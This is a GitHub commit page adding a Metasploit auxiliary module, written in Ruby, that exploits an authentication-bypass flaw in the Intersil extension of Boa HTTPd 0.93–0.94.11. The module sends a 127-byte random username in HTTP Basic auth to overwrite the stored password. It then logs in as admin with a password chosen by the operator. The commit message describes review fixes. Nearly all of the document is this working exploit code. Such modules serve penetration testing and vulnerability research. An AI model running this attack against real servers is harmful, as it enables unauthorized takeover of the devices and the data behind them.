Skip to content
This repository
Browse code

Add Intersil HTTP Basic auth pass reset (originally #453)

The modified version of pull request #453. This addresses a couple
of things including:
* Change the description to better explain what the vulnerability is.
  The advisory focuses the problem as an auth bypass, not DoS,
  although it can end up dosing the server.
* The title and filename are changed as a result of matching that
  advisory's description.
* Use 'TARGETURI' option instead of 'URI'.
* The reset attempt needs to check if the directory actually has
  401 in place, otherwise this may result a false-positive.
* The last HTTP request needs to check a possible nil return value.
* More verbose outputs.
  • Loading branch information...
commit e72303a9224ca71c2dbfbf4aaae9d7130cece89a 1 parent bf45de1
sinn3r sinn3r authored

Showing 1 changed file with 114 additions and 0 deletions. Show diff stats Hide diff stats

  1. +114 0 modules/auxiliary/admin/http/intersil_pass_reset.rb
114 modules/auxiliary/admin/http/intersil_pass_reset.rb
... ... @@ -0,0 +1,114 @@
  1 +##
  2 +# This file is part of the Metasploit Framework and may be subject to
  3 +# redistribution and commercial restrictions. Please see the Metasploit
  4 +# web site for more information on licensing and terms of use.
  5 +# http://metasploit.com/
  6 +##
  7 +
  8 +require 'msf/core'
  9 +
  10 +class Metasploit3 < Msf::Auxiliary
  11 +
  12 + include Msf::Exploit::Remote::HttpClient
  13 +
  14 + def initialize(info = {})
  15 + super(update_info(info,
  16 + 'Name' => 'Intersil (Boa) HTTPd Basic Authentication Password Reset',
  17 + 'Description' => %q{
  18 + The Intersil extention in the Boa HTTP Server 0.93.x - 0.94.11
  19 + allows basic authentication bypass when the user string is greater
  20 + than 127 bytes long. The long string causes the password to be
  21 + overwritten in memory, which enables the attacker to reset the
  22 + password. In addition, the malicious attempt also may cause a
  23 + denial-of-service condition.
  24 +
  25 + Please note that you must set the request URI to the directory that
  26 + requires basic authentication in order to work properly.
  27 + },
  28 + 'Author' =>
  29 + [
  30 + 'Luca "ikki" Carettoni <luca.carettoni[at]securenetwork.it>', #original discoverer
  31 + 'Claudio "paper" Merloni <claudio.merloni[at]securenetwork.it>', #original discoverer
  32 + 'Max Dietz <maxwell.r.dietz[at]gmail.com>' #metasploit module
  33 + ],
  34 + 'License' => MSF_LICENSE,
  35 + 'References' =>
  36 + [
  37 + [ 'URL', 'http://packetstormsecurity.org/files/59347/boa-bypass.txt.html']
  38 + ],
  39 + 'DisclosureDate' => 'Sep 10 2007'))
  40 +
  41 + register_options(
  42 + [
  43 + OptString.new('TARGETURI', [ true, "The request URI", '/']),
  44 + OptString.new('PASSWORD', [true, 'The password to set', 'pass'])
  45 + ], self.class)
  46 + end
  47 +
  48 + def check
  49 + begin
  50 + res = send_request_cgi({
  51 + 'uri'=>'/',
  52 + 'method'=>'GET'
  53 + })
  54 +
  55 + if (res and (m = res.headers['Server'].match(/Boa\/(.*)/)))
  56 + print_status("#{@peer} - Boa Version Detected: #{m[1]}")
  57 + return Exploit::CheckCode::Safe if (m[1][0].ord-48>0) # boa server wrong version
  58 + return Exploit::CheckCode::Safe if (m[1][3].ord-48>4)
  59 + return Exploit::CheckCode::Vulnerable
  60 + else
  61 + print_status("#{@peer} - Not a Boa Server!")
  62 + return Exploit::CheckCode::Safe # not a boa server
  63 + end
  64 +
  65 + rescue Rex::ConnectionRefused
  66 + print_error("#{@peer} - Connection refused by server.")
  67 + return Exploit::CheckCode::Safe
  68 + end
  69 + end
  70 +
  71 + def run
  72 + @peer = "#{rhost}:#{rport}"
  73 + return if check != Exploit::CheckCode::Vulnerable
  74 +
  75 + uri = target_uri.path
  76 + uri << '/' if uri[-1,1] != '/'
  77 +
  78 + res = send_request_cgi({
  79 + 'uri'=> uri,
  80 + 'method'=>'GET',
  81 + 'basic_auth' => "#{Rex::Text.rand_text_alpha(127)}:#{datastore['PASSWORD']}"
  82 + })
  83 +
  84 + if res.nil?
  85 + print_error("#{@peer} - The server may be down")
  86 + return
  87 + elsif res and res.code != 401
  88 + print_status("#{@peer} - #{uri} does not have basic authentication enabled")
  89 + return
  90 + end
  91 +
  92 + print_status("#{@peer} - Server still operational. Checking to see if password has been overwritten")
  93 + res = send_request_cgi({
  94 + 'uri' => uri,
  95 + 'method'=> 'GET',
  96 + 'basic_auth' => "admin:#{datastore['PASSWORD']}"
  97 + })
  98 +
  99 + if not res
  100 + print_error("#{@peer} - Server timedout, will not continue")
  101 + return
  102 + end
  103 +
  104 + case res.code
  105 + when 200
  106 + print_good("#{@peer} - Password reset successful with admin:#{datastore['PASSWORD']}")
  107 + when 401
  108 + print_error("#{@peer} - Access forbidden. The password reset attempt did not work")
  109 + else
  110 + print_status("#{@peer} - Unexpected response: Code #{res.code} encountered")
  111 + end
  112 +
  113 + end
  114 +end

0 comments on commit e72303a

Please sign in to comment.
Something went wrong with that request. Please try again.